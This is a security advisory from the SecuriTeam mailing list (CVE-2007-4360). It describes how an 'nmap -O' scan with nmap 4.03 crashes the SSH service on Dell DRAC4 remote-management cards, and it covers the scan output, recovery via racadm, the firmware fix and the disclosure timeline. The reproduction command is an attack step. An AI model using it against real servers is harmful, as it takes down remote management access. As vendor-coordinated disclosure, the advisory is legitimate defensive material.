[NEWS] SSH service at Dell DRAC4 Denial of Service (Mocana)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  SSH service at Dell DRAC4 Denial of Service (Mocana)
------------------------------------------------------------------------


SUMMARY

Dell Remote Access Card 4 (DRAC4) allows customers to effectively manage 
servers in remote locations where no administrative IT staff exists. It 
provides lights out management with continuous video that provides a 
graphical console regardless of the server's state and requires no 
operating system services or drivers. Virtual media support provides the 
server access to networked CD, floppy, and USB drives for server 
installation and updates (origin: Dell USA). The remote management is 
possible e.g. via web interface or via the provided integrated SSH daemon 
(running at port 22/TCP) based on Mocana SSH.

A vulnerability in the SSH server on the DELL DRAC4 allows remote 
attackers to cause it to crash by using nmap against it.

DETAILS

Remote Denial of Service for the SSH service provided by the integrated 
SSH daemon is possible by the use of nmap-4.03-3 from Debian unstable, 
which is also included in Ubuntu Depper. Please note, that this 
vulnerability can't be reproduced with every nmap version, e.g. nmap-4.20 
didn't work. After the use of such a port scanner, the SSH port is 
unavailable and can only be made available again by the use of the Dell 
utility "racadm" which causes a hard reboot of the whole system.

As there is another issue when having the DRAC4 virtual drives enabled, a 
second reboot needs to be performed manually, otherwise a SuSE Linux 
Enterprise Server 10 (SLES 10) with and without Service Pack 1 (SP1) will 
not boot up correctly and will end with lots of segmentation faults, I/O 
errors and so on. Please note, that the remote Denial of Service does not 
depend on the operating system used on the server.

Analysis:
There is NO exploitation which would allow unauthenticated remote 
attackers to gain root access. An affected machine has at least an 
unavailable SSH port at DRAC4, the web interface is working anyway, and in 
order to get SSH access at the DRAC4 back, one or multiple reboots are 
necessary.

As the provided feature to access DRAC4 by SSH is very useful and enabled 
per default, it is easy to attack machines and use this vulnerability for 
remote Denial of Service.

Presumably any "Dell Remote Access Controller 4/P (DRAC 4/P)" including 
"Firmware Version 1.50 (Build 02.16)" is affected by this vulnerability. 
At least, the problem is reproducible with version 1.50 (Build 02.16).

Reproducibility:
Further information regarding the use of nmap and the port scan are below. 
A normal port scan of the management IPv4 address of DRAC4 should look 
like this (the output below is a bit truncated for better readability):
$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:54 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Mocanada embedded SSH (protocol 2.0)
80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$

To bring the SSH daemon running at the DRAC4 down, the following command 
can be used in combination with the already described nmap version:

$ nmap -O [Management IPv4 address of DRAC4]
Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-07-09 14:55
CEST
Insufficient responses for TCP sequencing (0), OS detection may be less 
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less 
accurate
Insufficient responses for TCP sequencing (0), OS detection may be less 
accurate
Interesting ports on xxx.xxx.xxx.xxx:
(The 1670 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
5900/tcp open  vnc
No exact OS matches for host (If you know what OS is running on it, see 
http://www.insecure.org/cgi-bin/nmap-submit.cgi).

Nmap finished: 1 IP address (1 host up) scanned in 65.943 seconds
$

Now the SSH port is unavailable, a SSH connection establishment e.g. by 
OpenSSH client will time out, another port scan shows more details:

$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:56 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   filtered ssh
80/tcp   open     http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open     ssl/http Dell Remote Access Controller http interface 
2.0
5900/tcp open     vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.378 seconds
$

In order to get SSH access back, "racadm racreset" has to be executed, 
maybe further parameters are needed. More information regarding this can 
be taken from the Dell Remote Access Controller Racadm User's Guide.

Solution:
On October 31, 2007 the "Firmware Version 1.60 (Build 10.04)" for "Dell 
Remote Access Controller 4" (DRAC 4/I and DRAC 4/P) was released to solve 
this vulnerability. An upgrade to this new version is highly recommenced, 
but the whole DRAC4 configuration and settings have to be saved before, as 
a firmware update causes a loss of any DRAC4 specific settings. And for 
us, multiple firmware updates (EPROM flashings) failed during the upgrade; 
the only working one was the offline update using two floppy disks.

In the README file  <ftp://ftp.us.dell.com/sysman/readme_160_A00.txt> 
ftp://ftp.us.dell.com/sysman/readme_160_A00.txt, the correction of this 
issue is mentioned with "Added fix for Remote Denial of Service for SSH 
service", but no reference to this advisory.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4360> 
CVE-2007-4360 was assigned on August 15, 2007.

Disclosure Timeline:
2007-07-09 Initial vendor notification
2007-07-11 Initial vendor response
2007-07-16 Vendor communicated escalation to engineering
2007-07-23 Vendor communicated the reproducibility
2007-08-03 Vendor communicated the working for a solution
2007-08-13 Vendor communicated an unknown timeframe
2007-08-13 Coordinated public disclosure
2007-10-31 Vendor released firmware update version 1.60
2007-11-20 Vendor officially announced the new firmware
2008-01-10 Verified the new firmware for reproducibility
2008-01-18 Coordinated public advisory update


ADDITIONAL INFORMATION

The information has been provided by  <mailto:scheck@etes.de> Robert 
Scheck.
The original article can be found at:  <http://www.etes.de> 
http://www.etes.de



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.